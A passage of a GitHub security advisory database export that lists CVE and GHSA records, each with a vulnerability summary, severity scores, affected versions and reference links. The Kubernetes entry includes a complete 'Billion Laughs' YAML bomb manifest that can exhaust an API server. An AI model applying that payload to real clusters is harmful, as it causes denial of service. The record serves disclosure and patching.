'react-admin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.19.12'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'react-admin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.7.6'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ra-ui-materialui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.7.6'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ra-ui-materialui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.19.12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/marmelab/react-admin/security/advisories/GHSA-5jcr-82fh-339v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25572'}, {'type': 'WEB', 'url': 'https://github.com/marmelab/react-admin/pull/8644'}, {'type': 'WEB', 'url': 'https://github.com/marmelab/react-admin/pull/8645'}, {'type': 'PACKAGE', 'url': 'https://github.com/marmelab/react-admin'}, {'type': 'WEB', 'url': 'https://github.com/marmelab/react-admin/releases/tag/v3.19.12'}, {'type': 'WEB', 'url': 'https://github.com/marmelab/react-admin/releases/tag/v4.7.6'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:32:21Z', 'nvd_published_at': '2023-02-13T21:15:00Z'}" 1.4.0,GHSA-259w-8hf6-59c2,2023-02-24T19:11:47Z,2023-02-16T14:12:36Z,,['CVE-2023-25153'],OCI image importer memory exhaustion in github.com/containerd/containerd,"### Impact When importing an OCI image, there was no limit on the number of bytes read for certain files. A maliciously crafted image with a large file where a limit was not applied could cause a denial of service. ### Patches This bug has been fixed in containerd 1.6.18 and 1.5.18. Users should update to these versions to resolve the issue. ### Workarounds Ensure that only trusted images are used and that only trusted users have permissions to import images. ### Credits The containerd project would like to thank [David Korczynski](https://github.com/DavidKorczynski) and [Adam Korczynski](https://github.com/AdamKorcz) of ADA Logics for responsibly disclosing this issue in accordance with the [containerd security policy](https://github.com/containerd/project/blob/main/SECURITY.md) during a security fuzzing audit sponsored by CNCF. ### For more information If you have any questions or comments about this advisory: * Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose) * Email us at [security@containerd.io](mailto:security@containerd.io) To report a security issue in containerd: * [Report a new vulnerability](https://github.com/containerd/containerd/security/advisories/new) * Email us at [security@containerd.io](mailto:security@containerd.io)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.18'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '1.6.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/containerd/containerd/security/advisories/GHSA-259w-8hf6-59c2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25153'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/0c314901076a74a7b797a545d2f462285fdbb8c4'}, {'type': 'PACKAGE', 'url': 'https://github.com/containerd/containerd'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.5.18'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.6.18'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1573'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T14:12:36Z', 'nvd_published_at': '2023-02-16T15:15:00Z'}" 1.4.0,GHSA-xhjq-w7xm-p8qj,2023-08-30T11:33:45Z,2023-02-07T22:39:34Z,,['CVE-2017-3204'],golang.org/x/crypto/ssh Man-in-the-Middle attack,"The Go SSH library (x/crypto/ssh) by default does not verify host keys, facilitating man-in-the-middle attacks if ClientConfig.HostKeyCallback is not set. Default behavior changed in commit e4e2799 to require explicitly registering a hostkey verification mechanism.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'golang.org/x/crypto/ssh'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20170330155735-e4e2799dd7aa'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'golang.org/x/crypto'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20170330155735-e4e2799dd7aa'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-3204'}, {'type': 'WEB', 'url': 'https://github.com/golang/go/issues/19767'}, {'type': 'WEB', 'url': 'https://github.com/golang/crypto/commit/e4e2799dd7aab89f583e1d898300d96367750991'}, {'type': 'WEB', 'url': 'https://bridge.grumpy-troll.org/2017/04/golang-ssh-security/'}, {'type': 'WEB', 'url': 'https://go.dev/cl/340830'}, {'type': 'WEB', 'url': 'https://go.dev/issue/19767'}, {'type': 'WEB', 'url': 'https://go.googlesource.com/crypto/+/e4e2799dd7aab89f583e1d898300d96367750991'}, {'type': 'WEB', 'url': 'https://godoc.org/golang.org/x/crypto/ssh'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0013'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20170423080311/https://www.securityfocus.com/bid/97481'}, {'type': 'WEB', 'url': 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3204'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T22:39:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-fmxq-v8mg-qh25,2023-02-22T21:58:27Z,2023-02-22T21:58:27Z,,['CVE-2023-25569'],apollo-portal has potential CSRF issue,"### Impact A low-privileged user can create a special web page. If an authenticated portal admin visits this page, the page can silently send a request to assign new roles for that user without any confirmation from the Portal admin. ### Patches Cookie SameSite strategy was set to Lax in #4664 and was released in [v2.1.0](https://github.com/apolloconfig/apollo/releases/tag/v2.1.0). ### Workarounds To fix the potential issue without upgrading, simply follow the advice that does not visit unknown source pages. ### References [Apollo Security Guidence](https://www.apolloconfig.com/#/en/usage/apollo-user-guide?id=_71-security-related) ### For more information If you have any questions or comments about this advisory: * Open an issue in [issue](https://github.com/apolloconfig/apollo/issues) * Email us at [apollo-config@googlegroups.com](mailto:apollo-config@googlegroups.com) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.ctrip.framework.apollo:apollo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apolloconfig/apollo/security/advisories/GHSA-fmxq-v8mg-qh25'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25569'}, {'type': 'WEB', 'url': 'https://github.com/apolloconfig/apollo/pull/4664'}, {'type': 'WEB', 'url': 'https://github.com/apolloconfig/apollo/commit/00d968a7229f809b0d8ed0532e8c01a6c2b7c750'}, {'type': 'PACKAGE', 'url': 'https://github.com/apolloconfig/apollo'}, {'type': 'WEB', 'url': 'https://github.com/apolloconfig/apollo/releases/tag/v2.1.0'}, {'type': 'WEB', 'url': 'https://www.apolloconfig.com/#/en/usage/apollo-user-guide?id=_71-security-related'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T21:58:27Z', 'nvd_published_at': '2023-02-20T16:15:00Z'}" 1.4.0,GHSA-5x36-7567-3cw6,2023-02-28T20:31:05Z,2023-02-28T20:31:05Z,,[],partial_sort contains Out-of-bounds Read in release mode,"Affected versions of this crate were using a debug assertion to validate the `last` parameter of `partial_sort()`. This would allow invalid inputs to cause an out-of-bounds read instead of immediately panicking, when compiled without debug assertions. All writes are bounds-checked, so the out-of-bounds memory access is read-only. This also means that the first attempted out-of-bounds write will panic, limiting the possible reads. The accessible region is further limited by an initial bounds-checked read at `(last / 2) - 1`, i.e., it is proportional to the size of the vector. This bug has been fixed in v0.2.0. ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'partial_sort'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sundy-li/partial_sort/issues/7'}, {'type': 'PACKAGE', 'url': 'https://github.com/sundy-li/partial_sort'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0016.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T20:31:05Z', 'nvd_published_at': None}" 1.4.0,GHSA-6vp5-vv9p-7q62,2023-02-23T22:08:20Z,2023-02-12T15:30:25Z,,['CVE-2023-0789'],Command Injection in thorsten/phpmyfaq,Command Injection in GitHub repository thorsten/phpmyfaq prior to 3.1.11.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0789'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/40515c74815ace394ab23c6c19cbb33fd49059cb'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d9375178-2f23-4f5d-88bd-bba3d6ba7cc5'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T01:05:59Z', 'nvd_published_at': '2023-02-12T14:15:00Z'}" 1.4.0,GHSA-465f-mxxh-grc4,2023-02-22T00:10:21Z,2023-02-21T15:30:23Z,,['CVE-2021-32859'],Baremetrics date range picker vulnerable to Cross-site Scripting,The Baremetrics date range picker is a solution for selecting both date ranges and single dates from a single calender view. Versions 1.0.14 and prior are prone to cross-site scripting (XSS) when handling untrusted `placeholder` entries. An attacker who is able to influence the field `placeholder` when creating a `Calendar` instance is able to supply arbitrary `html` or `javascript` that will be rendered in the context of a user leading to XSS. There are no known patches for this issue.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'baremetrics-calendar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32859'}, {'type': 'PACKAGE', 'url': 'https://github.com/Baremetrics/calendar'}, {'type': 'WEB', 'url': 'https://github.com/Baremetrics/calendar/blob/240c20134ffbf0f0f246a50feff2be1ff19cf349/public/js/Calendar.js#L724'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-1042_Baremetrics_Date_Range_Picker/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:10:21Z', 'nvd_published_at': '2023-02-21T15:15:00Z'}" 1.4.0,GHSA-54q4-74p3-mgcw,2023-02-23T22:31:36Z,2023-02-16T00:30:27Z,,['CVE-2022-38867'],rttys SQL Injection vulnerability,"SQL Injection vulnerability in rttys versions 4.0.0, 4.0.1, and 4.0.2 in api.go, allows attackers to execute arbitrary code.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/zhaojh329/rttys'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'last_affected': '4.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-38867'}, {'type': 'WEB', 'url': 'https://github.com/zhaojh329/rttys/issues/117'}, {'type': 'PACKAGE', 'url': 'https://github.com/zhaojh329/rttys'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-23T22:31:36Z', 'nvd_published_at': '2023-02-15T22:15:00Z'}" 1.4.0,GHSA-g57g-rvpg-2f2c,2023-03-08T17:22:58Z,2023-02-23T15:33:05Z,,['CVE-2023-0868'],OpenNMS Meridian and Horizon vulnerable to Cross-site Scripting,Reflected cross-site scripting in graph results in multiple versions of OpenNMS Meridian and Horizon could allow an attacker access to steal session cookies.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '31.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0868'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/5740'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/a47e193f820c222b309763b508009e54b2f0e7f5'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/meridian/2022/releasenotes/changelog.html#releasenotes-changelog-Meridian-2022.1.13'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:22:58Z', 'nvd_published_at': '2023-02-23T15:15:00Z'}" 1.4.0,GHSA-7v39-jjj6-j4j4,2023-03-03T23:26:36Z,2023-02-23T15:33:05Z,,['CVE-2023-0869'],Cross Site Scripting in OpenNMS,Cross-site scripting in outage/list.htm in multiple versions of OpenNMS Meridian and Horizon allows an attacker access to confidential session information.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms-web-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '31.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0869'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/5734'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/meridian/2023/releasenotes/changelog.html#releasenotes-changelog-Meridian-2023.1.0'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-23T21:44:32Z', 'nvd_published_at': '2023-02-23T15:15:00Z'}" 1.4.0,GHSA-v5w6-wcm8-jm4q,2023-02-21T19:59:57Z,2023-02-08T22:22:58Z,,['CVE-2022-4450'],openssl-src contains Double free after calling `PEM_read_bio_ex`,"The function `PEM_read_bio_ex()` reads a PEM file from a BIO and parses and decodes the ""name"" (e.g. ""CERTIFICATE""), any header data and the payload data. If the function succeeds then the ""name_out"", ""header"" and ""data"" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case `PEM_read_bio_ex()` will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions `PEM_read_bio()` and `PEM_read()` are simple wrappers around `PEM_read_bio_ex()` and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including `PEM_X509_INFO_read_bio_ex()` and `SSL_CTX_use_serverinfo_file()` which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if `PEM_read_bio_ex()` returns a failure code. These locations include the `PEM_read_bio_TYPE()` functions as well as the decoders introduced in OpenSSL 3.0. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '111.25.0'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '300.0.0'}, {'fixed': '300.0.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4450'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0010.html'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20230207.txt'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:22:58Z', 'nvd_published_at': '2023-02-08T20:15:00Z'}" 1.4.0,GHSA-36gx-9q6h-g429,2023-03-09T04:24:16Z,2023-02-28T23:18:37Z,,['CVE-2022-39228'],vantage6 vulnerable to Observable Response Discrepancy,"### Impact We are incorporating the password policies listed in https://github.com/vantage6/vantage6/issues/59. One measure is that we don't let the user know in case of wrong username/password combination if the username actually exists, to prevent that bots can guess usernames. However, if a wrong password is entered a number of times, the user account is blocked temporarily. This way you could still find out which usernames exist. ### Patches Update to 3.8.0+ ### Workarounds No ### References https://github.com/vantage6/vantage6/issues/59 ### For more information If you have any questions or comments about this advisory: * Email us at [vantage6@iknl.nl](mailto:vantage6@iknl.nl) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'vantage6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.8.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vantage6/vantage6/security/advisories/GHSA-36gx-9q6h-g429'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-39228'}, {'type': 'WEB', 'url': 'https://github.com/vantage6/vantage6/issues/59'}, {'type': 'WEB', 'url': 'https://github.com/vantage6/vantage6/pull/281'}, {'type': 'WEB', 'url': 'https://github.com/vantage6/vantage6/commit/ab4381c35d24add06f75d5a8a284321f7a340bd2'}, {'type': 'PACKAGE', 'url': 'https://github.com/vantage6/vantage6'}]","{'cwe_ids': ['CWE-203', 'CWE-204'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T23:18:37Z', 'nvd_published_at': '2023-03-01T17:15:00Z'}" 1.4.0,GHSA-74fp-r6jw-h4mp,2023-09-29T15:14:38Z,2023-02-08T00:35:27Z,,[],Kubernetes apimachinery packages vulnerable to unbounded recursion in JSON or YAML parsing,"CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a ""Billion Laughs"" attack which is quite well known as an XML parsing issue. Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage. ```yaml apiVersion: v1 data: a: &a [""web"",""web"",""web"",""web"",""web"",""web"",""web"",""web"",""web""] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: default ``` ### Specific Go Packages Affected - k8s.io/apimachinery/pkg/runtime/serializer/json - k8s.io/apimachinery/pkg/util/json ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'k8s.io/apimachinery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20190927203648-9ce6eca90e73'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-11253'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/83253'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/83261'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-pmqp-h87c-mr78'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes/kubernetes'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-announce/c/jk8polzSUxs'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0965'}, {'type': 'WEB', 'url': 'https://stackoverflow.com/questions/58129150/security-yaml-bomb-user-can-restart-kube-api-by-sending-configmap/'}]","{'cwe_ids': ['CWE-20', 'CWE-776'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T00:35:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-w55j-f7vx-6q37,2023-02-06T23:49:46Z,2023-02-06T23:49:46Z,,['CVE-2018-1103'],Openshift Enterprise source-to-image vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip),"Openshift Enterprise source-to-image before version 1.1.10 is vulnerable to an improper validation of user input. An attacker who could trick a user into using the command to copy files locally, from a pod, could override files outside of the target directory of the command.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/openshift/source-to-image/pkg/tar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.10'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/openshift/source-to-image'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.10-0.20180427153919-f5cbcbc5cc6f'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-1103'}, {'type': 'WEB', 'url': 'https://github.com/openshift/source-to-image/pull/870'}, {'type': 'WEB', 'url': 'https://github.com/openshift/source-to-image/commit/f5cbcbc5cc6f8cc2f479a7302443bea407a700cb'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-1103'}, {'type': 'PACKAGE', 'url': 'https://github.com/openshift/source-to-image'}, {'type': 'WEB', 'url': 'https://github.com/snyk/zip-slip-vulnerability'}, {'type': 'WEB', 'url': 'https://hansmi.ch/articles/2018-04-openshift-s2i-security'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0026'}, {'type': 'WEB', 'url': 'https://snyk.io/research/zip-slip-vulnerability'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-06T23:49:46Z', 'nvd_published_at': None}" 1.4.0,GHSA-hxp2-xqf3-v83h,2023-06-13T23:50:59Z,2023-02-07T18:24:39Z,,[],Panic during unmarshal of Hello Verify Request in github.com/pion/dtls/v2,"### Impact When attempting to unmarshal a Server Hello request we could attempt to unmarshal into a buffer that was too small. This could result in a panic leading the program to crash. This issue could be abused to cause a denial of service. ### Workaround None","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pion/dtls'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.5.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pion/dtls/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pion/dtls/security/advisories/GHSA-hxp2-xqf3-v83h'}, {'type': 'WEB', 'url': 'https://github.com/pion/dtls/commit/7a14903448b70069fd9e02adf210ca23083c56d2'}, {'type': 'PACKAGE', 'url': 'https://github.com/pion/dtls'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1535'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T18:24:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-j69x-v4wc-3fpf,2023-03-06T21:58:20Z,2023-02-24T12:31:20Z,,['CVE-2023-25693'],Apache Airflow Sqoop Provider Improper Input Validation vulnerability,Improper Input Validation vulnerability in the Apache Airflow Sqoop Provider. This issue affects Apache Airflow Sqoop Provider versions before 3.1.1.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-apache-sqoop'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25693'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/29500'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/79qn8g5xbq036f8crb115obvr22l52q4'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:25:17Z', 'nvd_published_at': '2023-02-24T12:15:00Z'}" 1.4.0,GHSA-vp4r-h765-5mwp,2023-02-28T14:37:17Z,2023-02-17T03:30:25Z,,['CVE-2023-0877'],Code Injection in froxlor/froxlor,Code Injection in GitHub repository froxlor/froxlor prior to 2.0.11.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0877'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/aa48ffca2bcaf7ae57be3b8147bb3138abdab984'}, {'type': 'PACKAGE', 'url': 'https://github.com/Froxlor/Froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T20:54:40Z', 'nvd_published_at': '2023-02-17T01:15:00Z'}" 1.4.0,GHSA-9xpj-mvp2-3943,2023-03-08T15:29:24Z,2023-02-23T15:33:05Z,,['CVE-2023-0815'],OpenNMS has potential Insertion of Sensitive Information into Log File vulnerability,Potential Insertion of Sensitive Information into Jetty Log Files in multiple versions of OpenNMS Meridian and Horizon could allow disclosure of usernames and passwords if the logging level is set to debug.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '31.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0815'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/5741/files'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/meridian/2022/releasenotes/changelog.html#releasenotes-changelog-Meridian-2022.1.13'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/releases/tag/opennms-31.0.4-1'}]","{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T23:28:09Z', 